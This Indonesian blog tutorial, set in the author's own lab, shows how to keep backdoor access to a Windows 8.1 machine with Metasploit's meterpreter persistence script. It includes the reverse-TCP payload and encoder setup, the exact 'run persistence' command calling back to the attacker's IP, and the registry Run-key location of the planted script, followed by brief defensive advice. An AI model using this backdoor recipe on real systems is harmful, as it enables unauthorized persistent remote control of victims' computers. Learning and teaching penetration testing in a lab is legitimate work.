Learning Pentesting 3: Meterpreter Persistence Session on Metasploit

Bagaimana caranya mempertahankan hak akses ketika sudah berhasil mengekploitasi target??? Hal penting dalam metode penetration testing (hacking system) adalah menanam backdoor dan memudahkan membuka akses untuk infiltrasi selanjutnya. Di metasploit hal tersebut dapat dilakukan dengan bantuan metode persistence…

Seperti biasa, saya membangun lab real sendiri dengan rincian sebagai berikut:

1. Attacker: Kali Linux 1.09a persistence USB running on Lenovo Thinkpad E431 Intel Core I7

2. Victim: Windows 8.1 Enterprise running on Lenovo Ideapad U310 Intel Core I3

3. ISP: Telkomsel Ultima Flash dibagi dari Android Wifi Tethering (xperia m dual)

4. IP: Attacker 192.168.43.44 Victim 192.168.43.184

5. Metasploit Framework. Exploit: exploit/multi/handler Payload: (2x percobaan): windows/meterpreter/reverse_tcp dan windows/vncinject/reverse_tcp Encoder: x86/shikata_ga_nai

Untuk rangkuman pembelajaran atau Proof of Concept bisa dilihat di video YouTube buatan saya berikut. (Sekedarnya karena kondisi kurang kondusif dan memang ga dirancang untuk publikasi awalnya. Hanya ada yang request)😀

Untuk langkah-langkah yang dilakukan untuk mendapatkan sesi persistence meterpreter yakni dengan mengetikkan command berikut di bawah, pada kasus saya:

run persistence -U -i 5 -p 4444 -r 192.168.43.44

Yang arti syntaxnya sebagai berikut. -U: start automatis ketika user logon, -i: interval detik di antara koneksi balik (bebas mau diisi berapa saja), -p: port koneksi balik, -r: IP koneksi balik.

Metode berikut sukses dilakukan bahkan di windows 8.1. Pada kasus pembelajaran saya, script persistence ditulis di path berikut –> C:\Users\IT’SME~1\AppData\Local\Temp\zxbbDLYyjsiRk.vbs (perhatikan, di sini meterpreter menciptakan script vbs). Setelah dieksekusi maka script tadi akan masuk ke regestri dengan path berikut: HKCU\Software\Microsoft\Windows\CurrentVersion\RunTJlUGHDIHCo Bagi yang belum pernah nyentuh regedit di windows pasti akan kerepotan dengan automatisasi script seperti ini yang berjalan di awal saat proses dimulai.

Screenshot from 2015-02-21 21:18:40

Proses berjalan sempurna ketika user logon kembali ke windows setelah menyalakan komputernya. Koneksi akan tercipta otomatis selama ada internet. Kalau kita perhatikan di regedit maka penampakannya akan jadi seperti berikut:

Screenshot from 2015-02-21 21:21:20

Metode ini baru saya coba pada jaringan intranet. Tapi sebenarnya metode ini juga berjalan over the internet. Selamat berkreasi!!!😀

Selanjutnya akan saya share mengenai pentesting di android dan bagaimana cara mengatasi serangan pentesting dengan metasploit. Semoga saya ada waktu untuk update tulisannya…😆

Pesan moralnya: kuasai command prompt windows dan juga selalu periksa regedit, msconfig, taskmgr dan gpedit.msc untuk menghindari eksploitasi serupa.

Source:

http://www.offensive-security.com/metasploit-unleashed/Persistent_Meterpreter_Service

Devon Kearns; Mati Aharoni et al. 2011. Metasploit The Penetration Tester’s Guide. San Fransisco: No Starch Press, inc. (PDF version)

Offensive Security Team. 2011. Metasploit Unleashed (PDF version)

Dedicated to: KLABers (septian, faisal, alfian, agung, david, icho, fariz, ojhim, ucok, fahrizal, dinan, dan lain-lain yang ga saya sebutin satu per satu), Digital Lounge Balikpapan, Pak Istia Budi dan Mas Steven Nathaniel.

Special Thanks to: Gerald yang laptopnya dipinjam buat jadi victim sampai parno kalau saya macem2in. Tenang, saya bukan orang seperti itu😆

Didokumentasikan dadakan dan diselesaikan dalam waktu singkat setelah seharian jaga klnik. Terima kasih juga buat teman-teman yang memperhatikan waktu saya menerangkan sejarah tentang Backtrack, Kali, Metasploit dan hal-hal dasar seperti itu. Tumben ga terlalu gaduh, duduk manis, sampai ada yang nanya pakai acung jari😆

5 comments on “Learning Pentesting 3: Meterpreter Persistence Session on Metasploit

  1. Mari kalahkan DOTA 2 dengan belajar membobol dan impian ikut lomba CTF. ajakin mereka ikutan ini :

    http://cyberjawara.idsirtii.or.id/

  2. […] 4. Run Persistence Metasploit Method. Nah, yang satu ini artinya mempertahankan hak akses. Maintaining Access. Seorang hacker, cracker, atau pentester, ketika sudah masuk ke dalam sebuah sistem, maka harus dapat masuk lagi tanpa mengulang prosesnya dari awal. Untuk penjelasan lebih lengkap bisa lihat di tutorial sebelumnya. […]

  3. WALL-E says:

    kak…saya cara di atas saya sudah praktekkan dan berhasil merestart kompi victim,…..tapi saya ada pertanyaan ini,.. gmana caranya agar bisa di lanjut ketika komputer yang saya pakai itu di nyalakan ulang (kali sana)….maksudnya ketika saya menjalankan proramnya lansung di tahap sendin stage…..tidak lagi menunggu kompi victim untuk ngeklik backdoor yang kita buat…
    terimah kasih

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s